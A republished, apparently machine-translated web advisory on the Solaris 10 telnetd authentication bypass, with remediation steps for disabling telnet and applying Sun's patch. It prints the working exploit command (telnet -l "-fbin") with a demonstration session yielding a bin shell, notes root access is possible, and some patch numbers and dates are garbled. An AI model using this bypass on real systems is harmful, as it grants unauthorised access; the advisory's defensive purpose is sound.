Telnet Security Vulnerability Analysis

Source: Internet
Author: User

The telnet security vulnerability is one of the important factors for reducing Telnet usage. We will introduce the security issues in detail. First, let's take a look at the basic information about the telnet security vulnerability. Early versions of Solaris 2.6, 7, and 8 have a telnetd Vulnerability. You can bypass the verification using the environment variable TTYPROMPT of/bin/login. As a result, you can log on without authentication. Recently, telnet on Solaris 10 was found to have a vulnerability, and Sun also released a patch in time.

Let's first look at the symptoms of the problem. The system environment where the vulnerability occurs is Solaris 10 or later. The default installation is not selected during installation. The vulnerability occurs when you specify any "-fusername" parameter after the-l option of the Solaris telnet command, you can directly log on to the Solaris system.

Command Format:

 
 
  1. telnet -l "-fbin" target_address 

The following is a demonstration of using the telnet security vulnerability to log on to the system as a bin user.

 
 
  1. # telnet -l "-fbin" myhost  
  2. Trying 172.21.60.120...  
  3. Connected to myhost.  
  4. Escape character is '^]'.  
  5. Sun Microsystems Inc.  SunOS 5.10 Generic January 2005  
  6. $ id -a  
  7. uid=2(bin) gid=2(bin) groups=2(bin),3(sys) 

If the Administrator modifies the/etc/default/login file and comment out the CONSOLE line to allow root remote logon, the visitor can use this vulnerability to directly log on to the system as root, this poses greater harm to the system.

Kingsley first provided the source code of the vulnerability found in OpenSolaris and called it a "0-day"-zero-day vulnerability. Article address: http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

A script is provided in this Article. After running the script, the user can obtain the adm user permission of the logged-on system.

Solution:

1. disable the telnet service for Solaris 10.

Check whether the local telnet service is enabled.

 
 
  1. # svccfg list | grep telnet  
  2. network/telnet  
  3. # svcs -l network/telnet  
  4. fmri svc:/network/telnet:default  
  5. name Telnet server  
  6. enabled true  
  7. stateonline  
  8. next_state  none  
  9. state_time  Mon Feb 26 03:50:13 2007  
  10. restartersvc:/network/inetd:default 

Disable the telnet service.

 
 
  1. # svcadm disable svc:/network/telnet:default 

2. download and install the Sun Security Patch, which must be supported by the Sun service ).

Sun's Technical Support Engineer Alan Hargreaves's February 13 BLOG: http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit

As mentioned in, the final patch for solving this problem has been released on August 3. You can use the Update Manager of Solaris 10 to download and install the patch ,. The patch was released on July 15, February 21.

It should be noted that the Solaris 10 patch can be downloaded free of charge in addition to the Security and hardware patches, and all the other services must support the Sun Service Plan. However, if you know the Patch number, you can download it from a single http://sunsolve.sun.com. Here, you can use PatchFinder on sunsolve to find and download the 12768-03 patch and install it in the system.

System vulnerabilities are forbidden after patches are installed.

 
 
  1. # showrev -p | grep 120068  
  2. Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  3. Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  4. # telnet -l "-fbin" myhost  
  5. Trying 172.21.60.120...  
  6. Connected to myhost.  
  7. Escape character is '^]'.  
  8. Password: 

You need to enter a password to log on. The current telnet security vulnerability in the Solaris 10 system has been fixed.

Sun responded quickly to the newly discovered telnet security vulnerability of Solaris 10 and immediately launched the corresponding patch. We can also see that any operating system has bugs. Sun uses OpenSolaris open-source to enable the system Bug to be discovered and improved as soon as possible.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.